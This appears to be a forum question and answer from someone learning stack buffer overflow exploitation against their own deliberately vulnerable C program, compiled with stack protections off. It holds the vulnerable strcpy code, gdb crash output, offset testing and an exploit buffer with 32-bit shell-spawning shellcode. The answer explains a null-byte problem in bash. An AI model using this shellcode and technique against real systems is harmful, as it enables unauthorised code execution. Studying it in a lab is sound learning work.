Buffer Overflow - Finding EIP

Question

I am on Linux kali 5.6.0-kali2-amd64 #1 SMP Debian 5.6.14-1kali1 (2020-05-25) x86_64 GNU/Linux and I am learning to exploit buffer overflows vulnerabilities so I'm quite bad at doing it yet, so probably this will be an easy question, but I cannot find any useful resource online.

I am trying to exploit a simple program taking advantage of a buffer overflow vulnerability. The source code of the program is the following:

#include <stdio.h>
#include <string.h>

int main (int argc, char *argv[]){
        char buffer[64];

        if (argc < 2){
                printf("Error - Increase input!");
                return 1;
        }
        strcpy(buffer, argv[1]);
        return 0;
}

and the vulnerable function is strcpy.

I compiled it using:

gcc buf.c -o buf -fno-stack-protector -m32 -no-pie -z execstack -g

Finding the offset

So the first step I usually take is to build a buffer to find the right offset to write into the EIP.

kali@kali:~/Downloads/temp$ msf-pattern_create -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Using gdb (with peda installed), I run the program and I check the registers

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x33634132 ('2Ac3')
ECX: 0x63413163 ('c1Ac')
EDX: 0xffffd224 --> 0xffffd200 ("c1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A")
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x41346341 ('Ac4A')
ESP: 0x6341315f ('_1Ac')
EIP: 0x80491d8 (<main+102>:     ret)
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x80491d3 <main+97>: pop    ebx
   0x80491d4 <main+98>: pop    ebp
   0x80491d5 <main+99>: lea    esp,[ecx-0x4]
=> 0x80491d8 <main+102>:        ret    
   0x80491d9 <__x86.get_pc_thunk.ax>:   mov    eax,DWORD PTR [esp]
   0x80491dc <__x86.get_pc_thunk.ax+3>: ret    
   0x80491dd <__x86.get_pc_thunk.ax+4>: xchg   ax,ax
   0x80491df <__x86.get_pc_thunk.ax+6>: nop
[------------------------------------stack-------------------------------------]
Invalid $SP address: 0x6341315f
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080491d8 in main (argc=<error reading variable: Cannot access memory at address 0x63413163>, argv=<error reading variable: Cannot access memory at address 0x63413167>) at buf.c:13
13      }

As you can see from above, I cannot see what's in EIP, to use msf-pattern_offset in order to check what's the offset of the EIP.

Other Tests

Later on I tried other offsets and I noticed that if the buffer is exactly 64, the output is

gdb-peda$ run $(python -c 'print "A"*64')

##OUTPUT##
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('A' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('A' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('A' <repeats 48 times>)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('A' <repeats 48 times>)
0004| 0xffffd204 ('A' <repeats 44 times>)
0008| 0xffffd208 ('A' <repeats 40 times>)
0012| 0xffffd20c ('A' <repeats 36 times>)
0016| 0xffffd210 ('A' <repeats 32 times>)
0020| 0xffffd214 ('A' <repeats 28 times>)
0024| 0xffffd218 ('A' <repeats 24 times>)
0028| 0xffffd21c ('A' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()

Researching on that, I see that the EIP is exactly after 12 chars

gdb-peda$ run $(python -c 'print "A"*12 + "B"*4 + "C"*48')

#OUTPUT#
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0 
EBX: 0x0 
ECX: 0xffffd200 ('C' <repeats 48 times>)
EDX: 0xffffd230 --> 0xffffd200 ('C' <repeats 48 times>)
ESI: 0xf7fb2000 --> 0x1dfd6c 
EDI: 0xf7fb2000 --> 0x1dfd6c 
EBP: 0x0 
ESP: 0xffffd200 ('C' <repeats 48 times>)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd200 ('C' <repeats 48 times>)
0004| 0xffffd204 ('C' <repeats 44 times>)
0008| 0xffffd208 ('C' <repeats 40 times>)
0012| 0xffffd20c ('C' <repeats 36 times>)
0016| 0xffffd210 ('C' <repeats 32 times>)
0020| 0xffffd214 ('C' <repeats 28 times>)
0024| 0xffffd218 ('C' <repeats 24 times>)
0028| 0xffffd21c ('C' <repeats 20 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

Using a 32bit payload spawning a shell, my idea was to develop an exploit passing the following buffer to the program:

python -c 'print "\x90"*12 + "\x00\xd2\xff\xff" + "\x90"*12 + "\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80" + "\x90"*4'

and I get this output:

bash: warning: command substitution: ignored null byte in input
[Inferior 1 (process 5292) exited normally]
Warning: not running

So I think I am close, but I cannot figure out how to make it work.

SORRY FOR THE LENGTH OF THE QUESTION

Answer 1

bash: warning: command substitution: ignored null byte in input

bash uses C strings internally, so null bytes ( \0 ) signify end-of-string for it. Try using zsh instead (ie run zsh and then your command as written).